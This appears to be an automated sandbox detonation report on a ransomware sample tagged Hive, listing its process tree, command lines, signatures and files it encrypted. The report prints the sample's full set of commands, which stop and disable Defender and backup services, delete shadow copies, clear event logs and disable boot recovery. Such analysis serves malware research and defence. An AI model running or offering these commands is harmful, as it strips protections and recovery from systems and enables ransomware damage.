PID 1480 wrote to memory of 4216 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\net.exe
PID 1480 wrote to memory of 4216 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\net.exe
PID 4216 wrote to memory of 4356 | N/A | C:\Windows\SYSTEM32\net.exe | C:\Windows\system32\net1.exe
PID 4216 wrote to memory of 4356 | N/A | C:\Windows\SYSTEM32\net.exe | C:\Windows\system32\net1.exe
PID 1480 wrote to memory of 4416 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\net.exe
PID 1480 wrote to memory of 4416 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\net.exe
PID 4416 wrote to memory of 4316 | N/A | C:\Windows\SYSTEM32\net.exe | C:\Windows\system32\net1.exe
PID 4416 wrote to memory of 4316 | N/A | C:\Windows\SYSTEM32\net.exe | C:\Windows\system32\net1.exe
PID 1480 wrote to memory of 4300 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\net.exe
PID 1480 wrote to memory of 4300 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\net.exe
PID 4300 wrote to memory of 3324 | N/A | C:\Windows\SYSTEM32\net.exe | C:\Windows\system32\net1.exe
PID 4300 wrote to memory of 3324 | N/A | C:\Windows\SYSTEM32\net.exe | C:\Windows\system32\net1.exe
PID 1480 wrote to memory of 3888 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\net.exe
PID 1480 wrote to memory of 3888 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\net.exe
PID 3888 wrote to memory of 3656 | N/A | C:\Windows\SYSTEM32\net.exe | C:\Windows\system32\net1.exe
PID 3888 wrote to memory of 3656 | N/A | C:\Windows\SYSTEM32\net.exe | C:\Windows\system32\net1.exe
PID 1480 wrote to memory of 3192 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\sc.exe
PID 1480 wrote to memory of 3192 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\sc.exe
PID 1480 wrote to memory of 524 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\sc.exe
PID 1480 wrote to memory of 524 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\sc.exe
PID 1480 wrote to memory of 644 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\sc.exe
PID 1480 wrote to memory of 644 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\sc.exe
PID 1480 wrote to memory of 908 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\sc.exe
PID 1480 wrote to memory of 908 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\sc.exe
PID 1480 wrote to memory of 1068 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\sc.exe
PID 1480 wrote to memory of 1068 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\sc.exe
PID 1480 wrote to memory of 1228 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\sc.exe
PID 1480 wrote to memory of 1228 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\sc.exe
PID 1480 wrote to memory of 1448 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\sc.exe
PID 1480 wrote to memory of 1448 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\sc.exe
PID 1480 wrote to memory of 1632 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\sc.exe
PID 1480 wrote to memory of 1632 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\sc.exe
PID 1480 wrote to memory of 1896 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\sc.exe
PID 1480 wrote to memory of 1896 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\sc.exe
PID 1480 wrote to memory of 1808 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\reg.exe
PID 1480 wrote to memory of 1808 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\reg.exe
PID 1480 wrote to memory of 2340 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\reg.exe
PID 1480 wrote to memory of 2340 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\reg.exe
PID 1480 wrote to memory of 2576 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\reg.exe
PID 1480 wrote to memory of 2576 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\reg.exe
PID 1480 wrote to memory of 3256 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\reg.exe
PID 1480 wrote to memory of 3256 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\reg.exe
PID 1480 wrote to memory of 3088 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\reg.exe
PID 1480 wrote to memory of 3088 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe

"C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe"

C:\Windows\SYSTEM32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "vmicvss" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "vmicvss" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "UnistoreSvc_12c39" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UnistoreSvc_12c39" /y

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "vmicvss" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "UnistoreSvc_12c39" start= disabled

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

Network

Files

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 8592ba100a78835a6b94d5949e13dfc1
SHA1 63e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256 fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA512 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0bd87eabcff428ea3b433872afd92c8a
SHA1 3ea62c689c6c031b551d809f8c90b90d0a0f1850
SHA256 4e8960621d6ffdc02b3aca8719835cb11b98ef21e930b63916f43d306d7ee505
SHA512 20d59eacc3b6e579294d855e8a2c58911a2a5d1603ae218d0b693a3ee42a166b31555eb51e616d06ba64c1a1d28377d029979a096e812478fd93e865e4e0c49e

Analysis: behavioral1

Detonation Overview

Submitted

2022-01-12 20:48

Reported

2022-01-12 20:53

Platform

win7-en-20211208

Max time kernel

133s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Hive

ransomware hive

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Modifies extensions of user files

ransomware
Description Indicator Process Target
File opened for modification C:\Users\Admin\Pictures\MountCopy.png.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_ibd2RbKHgpA0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Users\Admin\Pictures\ProtectRedo.tiff.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_Rc47Lo2Ao500.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File renamed C:\Users\Admin\Pictures\UnprotectReset.crw => C:\Users\Admin\Pictures\UnprotectReset.crw.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_WDwP10GWZx80.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Users\Admin\Pictures\UseInstall.png.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_EcYdAi59bNc0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File renamed C:\Users\Admin\Pictures\CheckpointPush.tif => C:\Users\Admin\Pictures\CheckpointPush.tif.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_I5tD0wsAfNA0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Users\Admin\Pictures\CheckpointPush.tif.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_I5tD0wsAfNA0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File renamed C:\Users\Admin\Pictures\GroupAssert.crw => C:\Users\Admin\Pictures\GroupAssert.crw.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_5LaqSpALKo00.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Users\Admin\Pictures\UnprotectReset.crw.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_WDwP10GWZx80.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File renamed C:\Users\Admin\Pictures\UseInstall.png => C:\Users\Admin\Pictures\UseInstall.png.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_EcYdAi59bNc0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Users\Admin\Pictures\GroupAssert.crw.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_5LaqSpALKo00.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File renamed C:\Users\Admin\Pictures\MountCopy.png => C:\Users\Admin\Pictures\MountCopy.png.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_ibd2RbKHgpA0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File renamed C:\Users\Admin\Pictures\ProtectRedo.tiff => C:\Users\Admin\Pictures\ProtectRedo.tiff.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_Rc47Lo2Ao500.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-plaf_zh_CN.jar.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_x15BasrXYN40.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\simplexml.luac.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_RjZ817X5tE80.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SPRING\PREVIEW.GIF.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_MhUe8we7lts0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Adjacency.thmx.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_1_F5tswa1Vw0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\de-DE\picturePuzzle.html C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\glow.png C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Colombo.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_G0g6UHQUmlE0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Windows Media Player\fr-FR\wmlaunch.exe.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\drag.png C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105912.WMF.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_Mqv05mXNoYc0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0239063.WMF.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_UR-TWSk6Y-00.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18229_.WMF.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_eYCRUQ-fDPo0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\DataType\Priority.accft.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_2NWrEw4NyV00.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\en-US\tipresx.dll.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\Monticello.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_NPh0CfY_xTc0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Groove.en-us\GrooveMUI.XML.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_cgGmjWmhAuc0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\ja-JP\TipBand.dll.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsPreviewTemplate.html.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_ct_JXsD6yJk0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-first-quarter.png C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASKUPD.CFG.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_LZWqNJV9cZI0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
